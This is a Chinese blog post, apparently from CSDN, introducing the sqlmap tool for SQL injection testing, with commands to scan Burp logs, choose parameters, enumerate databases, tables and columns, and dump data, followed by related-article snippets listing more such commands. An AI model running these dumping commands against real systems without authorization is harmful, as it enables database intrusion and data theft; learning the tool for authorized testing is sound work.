sqlmap基础

最新推荐文章于 2024-04-12 14:25:15 发布
最新推荐文章于 2024-04-12 14:25:15 发布
阅读量708 收藏 1
点赞数
分类专栏: sql 文章标签: 数据库 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hintll/article/details/125274314
版权

sqlmap基础
sqlmap下载官方网站:https://sqlmap.org/

在这里插入图片描述直接下载zip就行
下载后正常解压

环境:python

直接用命令行进入文件夹后python sqlmap.py

在这里插入图片描述
查看版本:python sqlmap --version
有版本回显说明安装没问题

这里主要是使用sqlmap来爆破数据库进行sql注入所以只讲述sqlmap的sql注入方法

sqlmap利用bp日志文件扫描sql注入点
python.py sqlmap -l 日志文件
日志文件可以重burpsuit中进行截断复制到sqlmap.py的同文件下

如果URL中有多个参数可能存在注入点,使用-p 可以指定检测参数
如:sqlmap -u"url/?id=1&pasw=123&admin=123" -p “id,pasw” –

sqlmap参数:
–dbs列举数据库名

–tables 列举数据库的表名

sqlmap -u"url" -D 数据库名 --tables

–columns 列出字段
sqlmap -u"url" -D 数据库名 -T 数据表名 --columns

列出数据值
–dump
sqlmap -u"url" -D 数据库名 -T 数据表名 -C字段名 --dump

sqlmap支持联合注入、报错注入、布尔盲注、延时注入等

–technique=U 联合注入
sqlmap -u"url/?id=1" ----technique=U --current-db(利用union联合查询,列出当前网站所用数据库名称)

–technique=E报错注入

–technique=T
T表示时间盲注(延迟注入)

hint=flag
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlmap基础操作1
08-04
1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看 3、基于报错注入,即页面会返回
27.Sqlmap基础用法、CTF实战及请求参数设置(一)1
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。一.Sqlmap
Sqlmap入门
笨鸟的博客
08-29 403
@Sql注入原理     #通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。   @注入方法     #先猜表名         ##and (select count(*) from 表名)<>0         ##and...
最新SQLMap安装与入门技术_sqlmap最新版(1)
2401_84141419的博客
04-12 301
在后续的注入中,将参数“–columns”缩写成“-C”,意思是获取指定列的数据。技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。该命令的作用是列出数据库的所有用户。如果不在该命令中加入参数“-D”来指定某一个具体的数据库,则SQLMap会列出数据库中所有库的表,如图3-8所示。
网络安全——SQLMAP基础
weixin_54055099的博客
09-16 1790
SQLMAP基础使用
sqlmap基础使用
qq_53030229的博客
09-05 181
一、sqlmap命令(这些是我整理出来的比较基础的命令) windows10下sqlmap安装 -h, --help 显示基本帮助信息 -hh 显示高级帮助信息(简单理解就是帮助信息更清晰) -u URL, --url=URL Target URL (e.g. “http://www.site.com/vuln.php?id=1”) –level=LEVEL Level of tests to perform (1-5, default 1) –
渗透测试工具sqlmap基础教程.docx
10-25
渗透测试工具sqlmap基础教程.docx
sqlmap学习思维导图
02-07
sqlmap学习思维导图,含基础知识及sql注入流程介绍及实例。
ibatis基础案例
02-18
关于ibatis的基础教程<properties resource="it/ibatis/SqlMap.properties"/> ${driver}" /> ${url}" /> ${username}" /> ${password}" /> </transactionManager>
sqlmap基础使用
weixin_30323631的博客
01-31 127
sqlmap -u xxx 测试注入 sqlmap -u xxx -dbms 数据库类型 sqlmap -u --columns 列出所有字段 sqlmap -u xxx --tables 列出所有表 sqlmap -u xxx --dbs 列出所有库 sqlmap -u xxx --bath 自动输入y sqlmap -u xxx --current-db 列出当前使用的库 sq...
sqlmap基础入门超详细教程
weixin_30845171的博客
02-20 418
前言: 总算进入了自己喜欢的行业. 要时刻记得当初自己说过的话, 不忘初心. Come on! 资料: 感谢超哥分享的干货.. sqlmap干货点击直达 学习环境: 本次学习使用的是kali集成的sqlmap,包括后续的burp suite 不牵扯安装.此步略过. sqlmap简介: sqlmap是一款开源免费的漏洞检查、利用工具. 可以检测页面中get,pos...
sqlmap
weixin_30788731的博客
03-22 108
-u #注入点 -f #指纹判别数据库类型 -b #获取数据库版本信息 -p #指定可测试的参数(?page=1&id=2 -p “page,id”) -D “” #指定数据库名 -T “” #指定表名 -C “” #指定字段 -s “” #保存注入过程到一个文件,还可中断,下次恢复在注入(保存:-s “xx.log” 恢复:-s “xx.log” –resume) –c...
Sqlmap命令使用
一醉一休的博客
02-27 4098
Sqlmap基本命令使用,总结常用23条命令
SQLmap
m0_56010012的博客
05-05 1239
sqlmap注入的一般流程 判断是否存在注入点 查询数据库信息 根据数据库爆破数据表 根据数据库名和数据表名爆破字段名 爆破字段里面的数据 sqlmap注入的命令参数: 1、判断注入点:sqlmap.py -u url (目标地址) 2.爆破数据库名:sqlmap.py -u http://xxx.com/?id=1 --dbs --dbs查看所有数据库名 --current-db:查看当前使用的数据库 3.爆破数据表名:sqlmap.py -u url -D 库名 --tables
sqlmap--得数据
T-DRAGON
11-14 225
这个今天突然想起来–那个闯关网站 我就sqlmap 一试,可真有意思,sqli_labs闯关 sqlmap_project github上 直接sqlmap.py -u 43.247.91.228:84/Less-1/?id=1 就直接有反应了 不像之前在kali linux (主要自带,我这下的)搞半天,因为找个注入网址不容易啊,用什么高级搜索,找到包括 (index.php?id=1 or ....
SQLMap使用|命令大全(干货)
热门推荐
qq_45719090的博客
02-27 1万+
适合新手的sqlmap使用教程,附带sqlmap命令
sqlmap基本操作命令
apple12_12的博客
05-27 130
1.获取数据库相关信息: python sqlmap.py -u url 2.获取数据库内信息,获取数据库内所有数据库的名称: python sqlmap.py -u url --dbs 3.获取某个数据库中表的信息: python sqlmap.py -u url -D mys --tables 4.获取某个表内列的信息: python sqlmap.py -u url -D mys -T zzcms_admin --columns 5.获得数据库对应的字段数据 python sqlmap.py -u u
sqlmap使用基础
最新发布
04-27
以下是SQLMAP工具的基础使用方法[^1]: 1. 获取数据库表: ```shell sqlmap -u "http://192.168.164.1/sqllabs/Less-1/?id=1" --dbms mysql -v 1 -D security --tables ``` 这个命令将会获取指定URL中的数据库...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值